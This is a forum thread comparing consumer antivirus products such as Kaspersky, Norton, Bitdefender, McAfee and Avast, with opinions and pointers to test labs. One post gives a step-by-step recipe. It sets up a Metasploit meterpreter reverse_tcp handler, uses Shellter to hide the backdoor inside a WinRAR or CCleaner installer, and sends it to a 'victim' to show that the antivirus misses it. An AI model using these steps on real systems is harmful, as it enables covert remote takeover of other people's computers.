dude its depends on what you want from your Av...
IDK about how good McAfee is cuz I can't find any test about it ... but from what I know, they are good in Protecting Against Firmware & BIOS attack when others are not that good....
An av isn't only anti-RW or anti-Common Malware we should consider everything(Exploit, hardware protection, network protection.web protection)
btw I guess McAfee is cheaper than Kaspersky ...don't forget that McAfee is a big player...
guess you can combine MCAFEE+APP CHECK(FREE)+REHIPS(FREE) and get fantastic protection...
oh and sorry for my eng mistakes:p

where do you see any security suite installed on any of the VM's in the video? or are we just blindly going to trust this random individual?

You can be sure of yourself
install vmware on your os
install kali linux 2
and update sql database
create backdoor using meatsploit
#msfconsole
use exploit/multi/handler
set payloads windows/meterpreter/reverse_tcp
set your Local host using ifconfig command
set your port 8080
#exploit
ceate backdoor winrar or ccleaner or other
merge winrar and backdoor using shellter project
run shellter.exe on kali linux using wine
#wine shell.exe
PE target:winrar.exe

then
install windows 32 and install kaspersky
send winrar.exe to victim win732
and run it
you will notice that kaspersky is not doing anything
if you dont trust me i will upload video and install kaspersky tomorrow
The trust protection is Norton

In my opinion McAfee is not even an option as far as consumer products goes. As for ZoneAlarm they are sub par to the other 3. Then you have:

Norton: very good protection, light on system with a decent set of features.

Bitdefender: excellent protection with one of the best engine on the market, a little heavy, can be a little buggy sometimes and a good set of features.

Kaspersky: excellent protection, normal to heavy depending on what system you use it on, impressive set of features on their best suite.

If you're looking for the most extra features, Kaspersky Total Security would be the way to go. The only downside is that they protect less devices for the same price where Norton and Bitdefender car protect up to 10 devices.

But the best way to really know what best fits your needs would be to test ou these 3 AVs yourself as they offer free trial version ;)

My Laptop is specs:
ZBook 15 g3
Intel Core i7 6700HQ
16GB DDR4
512 SSD M2 2TB HDD
AMD FirePro Graphics
I see after reading comments
the Best Protection Bitdefender and Norton'.
Mcafee is Power Web protection (Site Advisor)
Ease of Use Interface and light is version 2017

What do you think?

Very nice rig. You should have no slowdowns on that setup ;)

this is a good idea but he wants to choose bewteen these products..avast isn't listed
Avast is a good, simple and free solution but don't forget Avast is a buggy software and it's not a clean product...jsut take a look at the Avast forum you can see yourself.
I found f-secure( beta) is less buggy than a stable version of Avast lol :p

I didn't meant he should use Avast. I was just mentioning to you that McAfee is not even an option here as Avast offers a way better protection for free. On on side note you mentioned Appcheck and Rehips that where not in the list either :p

I agree with you that F-Secure is very good indeed ;)

Does Avast offer better protection? prove me:p
where is that protection dude?MH tests?these tests are simple(ransomware+common malware) there is no exploit code, there is no network attack test, there is no firmware attack, there is no file less malware(ye only one)...
IDK McAfee is good in these tests or its bad.
But the fact is McAfee, Trend Micro, Sophos,... they are technology based company when avast is not they just got a behavior shield from Avg(shame) they had nothing before.
still, they don't have anything special... take a look at the Avast website and watch their products for enterprise grade then compare it with others.. those products are the technology and protection.
I Never used McAfee just read about it also am a noob user:p
Rehips and app check aren't listed but they can run alongside with any av so what is the problem? this guy wants to choose between these products can you run avast alongside McAfee or Kaspersky?

Hi @low L!fe

In addition to the valuable feedback given by users here you can also visit testing sites to read the testing reports like

AV Comparatives
AV-Test
VB Testing
ISCA Lab
Dennis Technology Lab etc

You can list down the top 3 best AV products which perform consistently for the pass 3 yrs. Then make a decision from there.

Okay so what does it mean that they are not a technology company? Are they a building construction company?
